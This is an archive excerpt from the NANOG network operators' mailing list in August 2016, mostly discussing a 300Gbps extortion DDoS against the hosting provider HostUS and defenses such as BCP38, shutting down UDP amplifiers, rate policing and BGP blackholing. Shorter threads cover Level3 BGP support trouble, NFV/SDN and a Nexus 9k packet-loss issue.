Do many last mile providers implement BCP38 at their CE? Seems like it's better to stop it at the CE than the PE. ----- Mike Hammett Intelligent Computing Solutions http://www.ics-il.com Midwest-IX http://www.midwest-ix.com ----- Original Message ----- From: "Ca By" To: ahebert at pubnix.net Cc: nanog at nanog.org Sent: Wednesday, August 3, 2016 9:36:09 AM Subject: Re: Host.us DDOS attack -and- related conversations On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > > Could it be related to the last 2 days DDoS of PokemonGO (which > failed) and some other gaming sites (Blizzard and Steam)? > > > And on the subject of CloudFlare, I'm sorry for that CloudFlare > person that defended their position earlier this week, but there may be > more hints (unverified) against your statements: > > https://twitter.com/xotehpoodle/status/756850023896322048 > > That could be explored. > > > On top of which there is hints (unverified) on which is the real bad > actor behind that new DDoS service: > > > > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > > And I quote: > > "One thing LeakedSource staff spotted was that the first payment > recorded in the botnet's control panel was of $1, while payments for the > same package plan were of $19.99." > > ( Paypal payments btw ) > > > There is enough information, and damages, imho, to start looking for > the people responsible from a legal standpoint. And hopefully the > proper authorities are interested. > > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. > > Bcp38 is not the issue. 
It is only the trigger, and as long as one network in Elbonia allows spoofs, that one network can marshall 100s of gbs of ddos power. Years of telling people to do bcp38 has not worked. The issue is for you and your neighbor to turn off your reflecting udp amplifiers (open dns relay, ssdp, ntp, chargen) and generously block obvious ddos traffic. A healthy udp policer is also smart. I suggest taking a baseline of your normal peak udp traffic, and build a policer that drops all udp that is 10x the baseline for bw and pps. Bcp38 is good, but it is not the solution we need to tactically stop attacks. This is not pretty. But it works at keeping your network up. CB ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 09:41, Robert Webb wrote: > > Anyone have any additonal info on a DDOS attack hitting host.us? > > > > Woke up to no email this morning and the following from their web site: > > > > > > > > *Following an extortion attempt, HostUS is currently experiencing > sustained > > large-scale DDOS attacks against a number of locations. The attacks were > > measured in one location at 300Gbps. In another location the attacks > > temporarily knocked out the entire metropolitan POP for a Tier-1 > provider. > > Please be patient. We will return soon. Your understanding is > appreciated. > > * > > > > > > >From my monitoring system, looks like my VPS went unavailable around > 23:00 > > EDT last night. 
> >
> > Robert
> >
> >

From cb.list6 at gmail.com Wed Aug 3 15:09:34 2016
From: cb.list6 at gmail.com (Ca By)
Date: Wed, 3 Aug 2016 08:09:34 -0700
Subject: Host.us DDOS attack -and- related conversations
In-Reply-To:
References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net>
Message-ID:

On Wednesday, August 3, 2016, Christopher Morrow wrote:

> On Wed, Aug 3, 2016 at 10:40 AM, James Bensley
> wrote:
>
> > How will
> > BCP save you then? Can everyone stop praising it like it was a some
> > magic bullet?
> >
>
> aren't you making a 'perfect is the enemy of good' argument here?
>
> 'seatbelts don't solve all car crash deaths, so let's just go mad-max!'
>

The point is, I have my seat belt on. I am doing the right thing. My car still gets smashed because mad max is on the road. I now have a broken back. And you are telling me to make sure to wear a seat belt. Did that. Did not stop mad max from ruining my day. Please provide more and better advice on avoiding injury. Step one. Collectively work to deflate mad max's tires (stop the udp reflectors that max uses)

From nanog at ics-il.net Wed Aug 3 15:11:02 2016
From: nanog at ics-il.net (Mike Hammett)
Date: Wed, 3 Aug 2016 10:11:02 -0500 (CDT)
Subject: Host.us DDOS attack -and- related conversations
In-Reply-To:
References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net>
Message-ID: <728812864.14570.1470237057599.JavaMail.mhammett@ThunderFuck>

Stopping one vector that makes up the largest of DDoSes certainly isn't a bad thing.

-----
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com
Midwest-IX
http://www.midwest-ix.com

----- Original Message -----
From: "James Bensley"
To: nanog at nanog.org
Sent: Wednesday, August 3, 2016 9:40:17 AM
Subject: Re: Host.us DDOS attack -and- related conversations

On 3 August 2016 at 15:16, Alain Hebert wrote:
> PS:
>
> I will like to take this time to underline the lack of
> participation from a vast majority of ISPs into BCP38 and the like.
We
> need to keep educating them at every occasion we have.
>
> For those that actually implemented some sort of tech against
> it, you are a beacon of hope in what is a ridiculous situation that has
> been happening for more than 15 years.

At the risk of starting a "NANOG war" [1], BCP isn't a magic wand.

If I find a zero day in the nasty customised kernels that OVH run on their clients boxes, I only need 300 compromised hosts to send 300Gbps of traffic without spoofing the IP or using amplification attacks [2].

I can rent a server with a 10Gbps connection for 1 hour for a few quid/dollars. I could generate hundreds of Gbps of traffic for about £1000 from legitimate IPs, paid for with stolen card details. How will BCP save you then? Can everyone stop praising it like it was a some magic bullet?

James.

[1] A pathetic and futile one, so different from the rest.

[2] Substitute OVH for any half decent provider that isn't really oversubscribed.

From nanog at ics-il.net Wed Aug 3 15:12:42 2016
From: nanog at ics-il.net (Mike Hammett)
Date: Wed, 3 Aug 2016 10:12:42 -0500 (CDT)
Subject: Host.us DDOS attack -and- related conversations
In-Reply-To:
References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net>
Message-ID: <2131346548.14573.1470237159642.JavaMail.mhammett@ThunderFuck>

As discussed a few months ago (maybe Christmas time?), Comcast is actively suspending accounts involved in DNS amplification. Certainly on a network like theirs, it's an internal issue as well.

-----
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com
Midwest-IX
http://www.midwest-ix.com

----- Original Message -----
From: "Ca By"
To: ahebert at pubnix.net
Cc: nanog at nanog.org
Sent: Wednesday, August 3, 2016 10:05:04 AM
Subject: Re: Host.us DDOS attack -and- related conversations

On Wednesday, August 3, 2016, Alain Hebert wrote:

> Well,
>
> I'm sorry.
> > That sound like the CloudFlare argument: You cannot fix the DDoSs > at the source because Elbonia can do it. The only solution is to pay > for protection. > > No. I hate the idea of paying for protection from a cloud or appliance. Elbonia just has the trigger. The loaded gun is the ddos reflector in comcast, cox, vz, and everyone else. > Between you and me, if only Elbonia are left DDoSing at 100Gbps, we > simply de-peer the commercial subnets from that country (leaving the > govt subnets up obviously) and see for them to deal with their trash > ISPs once for all. ( That's how we used to do it early on when the IIRC > flooding started ). > > There are known problematic networks. I have not seen any of them or their facilitating upstreams depeered. I can name 4 networks that source 75% of my attack attack traffic. Comcast was one due to their ssdp reflection, they stopped that now. But still lots of dns attacks from them. Or we keep getting DDoSed for the next 100+ years. > > On that track. > PS: Yes, the fictional country from the Dilbert syndicated cartoons. > > > Swap in your favorite real world country / network that has very real abuse source reputation. > On a humorous note: > > The DDoS protection lobby is our NRA. > > ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 10:36, Ca By wrote: > > On Wednesday, August 3, 2016, Alain Hebert > wrote: > > > >> Well, > >> > >> > >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> failed) and some other gaming sites (Blizzard and Steam)? > >> > >> > >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> person that defended their position earlier this week, but there may be > >> more hints (unverified) against your statements: > >> > >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> > >> That could be explored. 
> >> > >> > >> On top of which there is hints (unverified) on which is the real bad > >> actor behind that new DDoS service: > >> > >> > >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> > >> > >> And I quote: > >> > >> "One thing LeakedSource staff spotted was that the first payment > >> recorded in the botnet's control panel was of $1, while payments for the > >> same package plan were of $19.99." > >> > >> ( Paypal payments btw ) > >> > >> > >> There is enough information, and damages, imho, to start looking for > >> the people responsible from a legal standpoint. And hopefully the > >> proper authorities are interested. > >> > >> PS: > >> > >> I will like to take this time to underline the lack of > >> participation from a vast majority of ISPs into BCP38 and the like. We > >> need to keep educating them at every occasion we have. > >> > >> For those that actually implemented some sort of tech against > >> it, you are a beacon of hope in what is a ridiculous situation that has > >> been happening for more than 15 years. > >> > >> > > Bcp38 is not the issue. It is only the trigger, and as long as one > network > > in Elbonia allows spoofs, that one network can marshall 100s of gbs of > > ddos power. Years of telling people to do bcp38 has not worked. > > > > The issue is for you and your neighbor to turn off your reflecting udp > > amplifiers (open dns relay, ssdp, ntp, chargen) and generously block > > obvious ddos traffic. A healthy udp policer is also smart. I suggest > > taking a baseline of your normal peak udp traffic, and build a policer > that > > drops all udp that is 10x the baseline for bw and pps. > > > > Bcp38 is good, but it is not the solution we need to tactically stop > > attacks. > > > > This is not pretty. But it works at keeping your network up. > > > > CB > > > > > > ----- > >> Alain Hebert ahebert at pubnix.net > > >> > >> PubNIX Inc. > >> 50 boul. 
St-Charles
> >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
> >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443
> >>
> >> On 08/03/16 09:41, Robert Webb wrote:
> >>> Anyone have any additional info on a DDOS attack hitting host.us?
> >>>
> >>> Woke up to no email this morning and the following from their web site:
> >>>
> >>>
> >>>
> >>> *Following an extortion attempt, HostUS is currently experiencing
> >> sustained
> >>> large-scale DDOS attacks against a number of locations. The attacks
> were
> >>> measured in one location at 300Gbps. In another location the attacks
> >>> temporarily knocked out the entire metropolitan POP for a Tier-1
> >> provider.
> >>> Please be patient. We will return soon. Your understanding is
> >> appreciated.
> >>> *
> >>>
> >>>
> >>> >From my monitoring system, looks like my VPS went unavailable around
> >> 23:00
> >>> EDT last night.
> >>>
> >>> Robert
> >>>
> >>
> >

From mel at beckman.org Wed Aug 3 16:01:05 2016
From: mel at beckman.org (Mel Beckman)
Date: Wed, 3 Aug 2016 16:01:05 +0000
Subject: Clueful BGP from TW-Telecom/L3
In-Reply-To: <6463BEF1-546E-41D3-8ABB-C7058BC55D2D@emanon.com>
References: <6463BEF1-546E-41D3-8ABB-C7058BC55D2D@emanon.com>
Message-ID:

We recently had a similar case and had to solve the problem by working with IO and another provider outside of Level3. We got the same Level3 instruction to install various community strings, and when that didn't work their response was basically "oh, well." We have jury rigged a fix by trial and error, and Level3 says they will converge the Level3 and TWTelecom networks in a couple months. Whether that means an ASN change I don't know.

-mel

> On Aug 3, 2016, at 7:32 AM, Scott Morris wrote:
>
> Yeah, considering that I STILL haven't managed to get anyone in their supposed "Tier 3" group to call back on the open case is just completely baffling to me.
And with the Level 3 side, I've tried all sorts of different communities they supposedly use only to find that other policies override how those are treated along the way. I just don't understand how customer support can be such a difficult thing.
>
> Scott
>
> From: Micah Croff
> Date: Tuesday, July 26, 2016 at 6:21 PM
> To: Scott Morris
> Cc: "nanog at nanog.org"
> Subject: Re: Clueful BGP from TW-Telecom/L3
>
> Last I dealt with TW Telecom and BGP we had to explain to them that putting in a static route on both routers on top of BGP was not desired. Then they reconfigured a circuit 30 miles away when trying to turn it up again causing an outage in our data center.
>
> Sorry, not super hopeful when it comes to TW Telecom.
>
> Micah
>
> On Mon, Jul 25, 2016 at 8:51 PM, Scott Morris wrote:
> Is there per chance anyone hanging on here who is clueful about BGP working with TW-Telecom and the recent integration with Level3????
>
> I have a client that I consult with whose route is not getting sent from TW to L3 and the techs on the case are convinced we need to put different BGP communities in (both to TW link and other provider link) which of course we are putting in to satisfy them, but magically it is not working. This SHOULD be an easy thing to figure out using the Looking Glass servers within both TW and Level3, but this concept is lost on techs we are dealing with.
>
> Anyone internal there who can contact me off-list would be greatly appreciated!
>
> Scott
> swm at emanon.com
>
>
>
>
>

From rwfireguru at gmail.com Wed Aug 3 16:04:50 2016
From: rwfireguru at gmail.com (Robert Webb)
Date: Wed, 3 Aug 2016 12:04:50 -0400
Subject: Host.us DDOS attack -and- related conversations
In-Reply-To:
References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net>
Message-ID:

Thanks for that link. My host is sitting in Atlanta and I believe that Atlanta hosts their main infrastructure.

I am seeing around a 12 or 13 hour outage at this point.
Robert On Wed, Aug 3, 2016 at 11:08 AM, Soon Keat Neo wrote: > Back on topic about HostUS, I've been following a thread on LowEndTalk > where seemingly Alexander's been updating ( > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) - > seems like Atlanta and LA are still down ATM based on latest reports - > nearly 10 hours now. > > Tks. > > Regards, > Neo Soon Keat > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > >> Apologies to all as the hostname in my subject is incorrect. >> >> It should be hostus.us... >> >> >> >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb >> wrote: >> >> > Not sure if it is related to the PokemonGO or not. This started around >> > 23:00 EDT last night per my monitoring. >> > >> > Seems like a pretty big attack at 300Gbps and to also temporarily take a >> > down a Tier 1 POP in a major city. >> > >> > I was interested as to if this might be a botnet or some type of >> > reflection attack. >> > >> > >> > Robert >> > >> > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert >> wrote: >> > >> >> Well, >> >> >> >> >> >> Could it be related to the last 2 days DDoS of PokemonGO (which >> >> failed) and some other gaming sites (Blizzard and Steam)? >> >> >> >> >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare >> >> person that defended their position earlier this week, but there may be >> >> more hints (unverified) against your statements: >> >> >> >> https://twitter.com/xotehpoodle/status/756850023896322048 >> >> >> >> That could be explored. 
>> >> >> >> >> >> On top of which there is hints (unverified) on which is the real >> bad >> >> actor behind that new DDoS service: >> >> >> >> >> >> >> >> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >> >> >> >> >> >> And I quote: >> >> >> >> "One thing LeakedSource staff spotted was that the first >> payment >> >> recorded in the botnet's control panel was of $1, while payments for >> the >> >> same package plan were of $19.99." >> >> >> >> ( Paypal payments btw ) >> >> >> >> >> >> There is enough information, and damages, imho, to start looking >> for >> >> the people responsible from a legal standpoint. And hopefully the >> >> proper authorities are interested. >> >> >> >> PS: >> >> >> >> I will like to take this time to underline the lack of >> >> participation from a vast majority of ISPs into BCP38 and the like. We >> >> need to keep educating them at every occasion we have. >> >> >> >> For those that actually implemented some sort of tech against >> >> it, you are a beacon of hope in what is a ridiculous situation that has >> >> been happening for more than 15 years. >> >> >> >> ----- >> >> Alain Hebert ahebert at pubnix.net >> >> PubNIX Inc. >> >> 50 boul. St-Charles >> >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 >> >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >> >> >> >> On 08/03/16 09:41, Robert Webb wrote: >> >> > Anyone have any additonal info on a DDOS attack hitting host.us? >> >> > >> >> > Woke up to no email this morning and the following from their web >> site: >> >> > >> >> > >> >> > >> >> > *Following an extortion attempt, HostUS is currently experiencing >> >> sustained >> >> > large-scale DDOS attacks against a number of locations. The attacks >> were >> >> > measured in one location at 300Gbps. In another location the attacks >> >> > temporarily knocked out the entire metropolitan POP for a Tier-1 >> >> provider. >> >> > Please be patient. 
We will return soon. Your understanding is
>> >> appreciated.
>> >> > *
>> >> >
>> >> >
>> >> > >From my monitoring system, looks like my VPS went unavailable around
>> >> 23:00
>> >> > EDT last night.
>> >> >
>> >> > Robert
>> >> >
>> >>
>> >>
>> >
>> >
>

From deleskie at gmail.com Wed Aug 3 16:11:18 2016
From: deleskie at gmail.com (jim deleskie)
Date: Wed, 3 Aug 2016 13:11:18 -0300
Subject: NFV Solution Evaluation Methodology
In-Reply-To:
References:
Message-ID:

I struggled with this whole SDN/NVF/insert marketing term for a while at first, until I sat down and actually thought about it. When I strip away all the foo, what I'm left with is breaking things down to pieces and putting logo blocks together in a way that best suits what I'm doing. It is really going back to the way things were a long time ago in the days of 12/2400 baud models and 56k frame relay. It doesn't help vendors that want to sell you over priced foo for features you don't really need. It lets you, if you have clue, build your own right bits. It will see some vendors evolve, new vendors of their brand of foo appear and some vendors die, but end of day, it's no different than most of us were doing back in the "good ol days"

-jim

On Wed, Aug 3, 2016 at 11:27 AM, Christopher Morrow wrote:

> On Wed, Aug 3, 2016 at 8:20 AM, Ca By wrote:
>
> >
> >
> > On Wednesday, August 3, 2016, Randy Bush wrote:
> >
> >> > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built
> >> > appliance garbage that can't scale in a cost effective manner and
> >> > replacing it with some software solution on 'many' commodity
> >> > unix-like-hosts that can scale horizontally.
> >> > >> my main worry about nfv is when they need more forwarding horsepower > >> than the household appliance has, and the data plan is is moved > >> > > > this is a scaling problem, and one which points to the need to not do 'all > of one thing' ('all nfv will solve us!') you may still need other methods > to load balance or deal with loads which are higher than the nfv > platform(s) can deal with properly. > > In some sense this is the same problem as trying to push too many pps > through a linecard which you know has a limit lower than line-rate. > > > > out of the control plane and they are not congruent. we've had too many > >> lessons debugging this situation (datakit, atm, ...). > >> > >> > seperation of data/control plane ... does require knowledge about what you > are doing and has clear implications on toolling, troubleshooting, etc. > > To some extent this mirrors anycast dns deployment problems. "I made a much > more complex system, though from the outside perhaps it doesn't appear any > different." be prepared for interesting times. > > > > Sdn is like authoritarianism and divine creation rolled up into one and > > sold at 20% premium to easily duped telco types that want to travel to > > endless conferences > > > > > Sure, you have to know what you are doing/buying... magic doesn't exist in > this space. > > > > > > > >> beyond that, i am not sure i see that much difference whether it's a > >> YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, > >> supported communities, ... > >> > >> randy > >> > > > From critellia at gmail.com Tue Aug 2 18:45:46 2016 From: critellia at gmail.com (Anthony Critelli) Date: Tue, 2 Aug 2016 14:45:46 -0400 Subject: Nexus 9k, packet loss through switch on vlan without SVI In-Reply-To: References: Message-ID: I'd also be inclined toward quirky 9k internals. I believe a colleague of mine troubleshot an issue with latency/slowness through some Nexus switches (I can't recall if they were 9ks). 
After engaging TAC, they noticed that "no ip redirects" was applied to the VLAN 1 SVI but none of the other SVIs. While it theoretically shouldn't have made any difference, they applied "no ip redirects" to the rest of the SVIs and everything started working just fine. Sincerely, Anthony Critelli B.S. Applied Networking and Systems Administration, 2014 www.acritelli.com (845) 283-4117 On Sun, Jul 24, 2016 at 12:32 PM, Jeremy wrote: > Running into some weird issues with a Cisco Nexus9k. > > We have a Cisco 3750X pair stacked, port channel (2x 1G) to a two different > blades on a Nexus9k. Isolating the links of the port channel , on one link > we can consistently get 800mbps (using iperf), or the other link we > consistently get ~34mbps. > > we have seen this across multiple 3750X stacks. > > The vlan we were on is just layer2 through the n9k, there are no IP > addresses. We were able to (apparently) resolve this issue by creating an > SVI on the n9k, with an empty config. > > Now, even isolating links we can get ~800mbps across the n9k, through the > various 3750X stacks. > > I am confused why creating the SVI would have an impact on this, and why it > wouldn't be consistent across both links. If the lack of SVI were at fault, > I would be less surprised if it just flat out didn't work, but this partial > working state feels very odd. > > Anyone else seen this? Thoughts? Could traffic be hitting the CPU while > going across modules? This feels like quirky n9k internals... > > Thanks! 
> Jeremy > > PS: no CRC errors found on interfaces, all looked clean > From neo at soonke.at Wed Aug 3 15:08:53 2016 From: neo at soonke.at (Soon Keat Neo) Date: Wed, 3 Aug 2016 23:08:53 +0800 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Back on topic about HostUS, I've been following a thread on LowEndTalk where seemingly Alexander's been updating ( https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) - seems like Atlanta and LA are still down ATM based on latest reports - nearly 10 hours now. Tks. Regards, Neo Soon Keat 2016-08-03 22:28 GMT+08:00 Robert Webb : > Apologies to all as the hostname in my subject is incorrect. > > It should be hostus.us... > > > > On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb wrote: > > > Not sure if it is related to the PokemonGO or not. This started around > > 23:00 EDT last night per my monitoring. > > > > Seems like a pretty big attack at 300Gbps and to also temporarily take a > > down a Tier 1 POP in a major city. > > > > I was interested as to if this might be a botnet or some type of > > reflection attack. > > > > > > Robert > > > > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > wrote: > > > >> Well, > >> > >> > >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> failed) and some other gaming sites (Blizzard and Steam)? > >> > >> > >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> person that defended their position earlier this week, but there may be > >> more hints (unverified) against your statements: > >> > >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> > >> That could be explored. 
> >> > >> > >> On top of which there is hints (unverified) on which is the real bad > >> actor behind that new DDoS service: > >> > >> > >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> > >> > >> And I quote: > >> > >> "One thing LeakedSource staff spotted was that the first payment > >> recorded in the botnet's control panel was of $1, while payments for the > >> same package plan were of $19.99." > >> > >> ( Paypal payments btw ) > >> > >> > >> There is enough information, and damages, imho, to start looking for > >> the people responsible from a legal standpoint. And hopefully the > >> proper authorities are interested. > >> > >> PS: > >> > >> I will like to take this time to underline the lack of > >> participation from a vast majority of ISPs into BCP38 and the like. We > >> need to keep educating them at every occasion we have. > >> > >> For those that actually implemented some sort of tech against > >> it, you are a beacon of hope in what is a ridiculous situation that has > >> been happening for more than 15 years. > >> > >> ----- > >> Alain Hebert ahebert at pubnix.net > >> PubNIX Inc. > >> 50 boul. St-Charles > >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> > >> On 08/03/16 09:41, Robert Webb wrote: > >> > Anyone have any additonal info on a DDOS attack hitting host.us? > >> > > >> > Woke up to no email this morning and the following from their web > site: > >> > > >> > > >> > > >> > *Following an extortion attempt, HostUS is currently experiencing > >> sustained > >> > large-scale DDOS attacks against a number of locations. The attacks > were > >> > measured in one location at 300Gbps. In another location the attacks > >> > temporarily knocked out the entire metropolitan POP for a Tier-1 > >> provider. > >> > Please be patient. We will return soon. Your understanding is > >> appreciated. 
> >> > * > >> > > >> > > >> > >From my monitoring system, looks like my VPS went unavailable around > >> 23:00 > >> > EDT last night. > >> > > >> > Robert > >> > > >> > >> > > > From Valdis.Kletnieks at vt.edu Wed Aug 3 17:09:29 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 03 Aug 2016 13:09:29 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Message-ID: <13188.1470244169@turing-police.cc.vt.edu> On Wed, 03 Aug 2016 10:53:22 -0400, Alain Hebert said: > Between you and me, if only Elbonia are left DDoSing at 100Gbps, we > simply de-peer the commercial subnets from that country (leaving the > govt subnets up obviously) Explain why, for those of us who don't see it as obvious. From morrowc.lists at gmail.com Wed Aug 3 20:16:06 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 3 Aug 2016 16:16:06 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: it's good that there aren't any easy solutions to this sort of problem... wait... that's wrong, there are. On Wed, Aug 3, 2016 at 12:04 PM, Robert Webb wrote: > Thanks for that link. My host is sitting in Atlanta and I believe that > Atlanta hosts their main infrastructure. > > I am seeing around a 12 or 13 hour outage at this point.
> > Robert > > On Wed, Aug 3, 2016 at 11:08 AM, Soon Keat Neo wrote: > > > Back on topic about HostUS, I've been following a thread on LowEndTalk > > where seemingly Alexander's been updating ( > > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) > - > > seems like Atlanta and LA are still down ATM based on latest reports - > > nearly 10 hours now. > > > > Tks. > > > > Regards, > > Neo Soon Keat > > > > > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > > > >> Apologies to all as the hostname in my subject is incorrect. > >> > >> It should be hostus.us... > >> > >> > >> > >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb > >> wrote: > >> > >> > Not sure if it is related to the PokemonGO or not. This started around > >> > 23:00 EDT last night per my monitoring. > >> > > >> > Seems like a pretty big attack at 300Gbps and to also temporarily > take a > >> > down a Tier 1 POP in a major city. > >> > > >> > I was interested as to if this might be a botnet or some type of > >> > reflection attack. > >> > > >> > > >> > Robert > >> > > >> > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > >> wrote: > >> > > >> >> Well, > >> >> > >> >> > >> >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> >> failed) and some other gaming sites (Blizzard and Steam)? > >> >> > >> >> > >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> >> person that defended their position earlier this week, but there may > be > >> >> more hints (unverified) against your statements: > >> >> > >> >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> >> > >> >> That could be explored. 
> >> >> > >> >> > >> >> On top of which there is hints (unverified) on which is the real > >> bad > >> >> actor behind that new DDoS service: > >> >> > >> >> > >> >> > >> >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> >> > >> >> > >> >> And I quote: > >> >> > >> >> "One thing LeakedSource staff spotted was that the first > >> payment > >> >> recorded in the botnet's control panel was of $1, while payments for > >> the > >> >> same package plan were of $19.99." > >> >> > >> >> ( Paypal payments btw ) > >> >> > >> >> > >> >> There is enough information, and damages, imho, to start looking > >> for > >> >> the people responsible from a legal standpoint. And hopefully the > >> >> proper authorities are interested. > >> >> > >> >> PS: > >> >> > >> >> I will like to take this time to underline the lack of > >> >> participation from a vast majority of ISPs into BCP38 and the like. > We > >> >> need to keep educating them at every occasion we have. > >> >> > >> >> For those that actually implemented some sort of tech against > >> >> it, you are a beacon of hope in what is a ridiculous situation that > has > >> >> been happening for more than 15 years. > >> >> > >> >> ----- > >> >> Alain Hebert ahebert at pubnix.net > >> >> PubNIX Inc. > >> >> 50 boul. St-Charles > >> >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> >> > >> >> On 08/03/16 09:41, Robert Webb wrote: > >> >> > Anyone have any additonal info on a DDOS attack hitting host.us? > >> >> > > >> >> > Woke up to no email this morning and the following from their web > >> site: > >> >> > > >> >> > > >> >> > > >> >> > *Following an extortion attempt, HostUS is currently experiencing > >> >> sustained > >> >> > large-scale DDOS attacks against a number of locations. The attacks > >> were > >> >> > measured in one location at 300Gbps. 
In another location the > attacks > >> >> > temporarily knocked out the entire metropolitan POP for a Tier-1 > >> >> provider. > >> >> > Please be patient. We will return soon. Your understanding is > >> >> appreciated. > >> >> > * > >> >> > > >> >> > > >> >> > >From my monitoring system, looks like my VPS went unavailable > around > >> >> 23:00 > >> >> > EDT last night. > >> >> > > >> >> > Robert > >> >> > > >> >> > >> >> > >> > > >> > > > > > From tony at wicks.co.nz Wed Aug 3 21:10:18 2016 From: tony at wicks.co.nz (Tony Wicks) Date: Thu, 4 Aug 2016 09:10:18 +1200 Subject: Host.us DDOS attack In-Reply-To: References: Message-ID: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> Interestingly my VM (LA) with them has been effectively down for half a day as far as IPv4 is concerned. IPv6 traffic seems unaffected. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Robert Webb Sent: Thursday, 4 August 2016 1:42 AM To: NANOG list Subject: Host.us DDOS attack Anyone have any additional info on a DDOS attack hitting host.us? Woke up to no email this morning and the following from their web site: From tony at wicks.co.nz Wed Aug 3 21:27:57 2016 From: tony at wicks.co.nz (Tony Wicks) Date: Thu, 4 Aug 2016 09:27:57 +1200 Subject: Host.us DDOS attack In-Reply-To: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> References: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> Message-ID: <007501d1edcd$e87b7a60$b9726f20$@wicks.co.nz> Further to that, and I would suggest it should be part of the overall discussion here. It appears the IPv4 IP block my VM is in is not currently advertised on the world route table. I assume hostus.us's transit provider has dropped their ipv4 BGP to save themselves. This is really the ultimate reward for the extortionists as they don't even need to sustain the DDOS to attack their target. While I see the transit provider's point of view, it's a pretty shitty situation for their customer, and their customers/customers. 
-----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Tony Wicks Sent: Thursday, 4 August 2016 9:10 AM To: 'NANOG list' Subject: RE: Host.us DDOS attack Interestingly my VM (LA) with them has been effectively down for half a day as far as IPv4 is concerned. IPv6 traffic seems unaffected. From jason at unlimitednet.us Wed Aug 3 21:31:27 2016 From: jason at unlimitednet.us (Jason Canady) Date: Wed, 3 Aug 2016 17:31:27 -0400 Subject: Host.us DDOS attack In-Reply-To: <007501d1edcd$e87b7a60$b9726f20$@wicks.co.nz> References: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> <007501d1edcd$e87b7a60$b9726f20$@wicks.co.nz> Message-ID: Strange that they cannot send a BGP blackhole upstream to keep everyone else online within their advertised route. On 8/3/16 5:27 PM, Tony Wicks wrote: > Further to that, and I would suggest it should be part of the overall discussion here. It appears the IPv4 IP block my VM is in is not currently advertised on the world route table. I assume hostus.us's transit provider has dropped their ipv4 BGP to save themselves. This is really the ultimate reward for the extortionists as they don't even need to sustain the DDOS 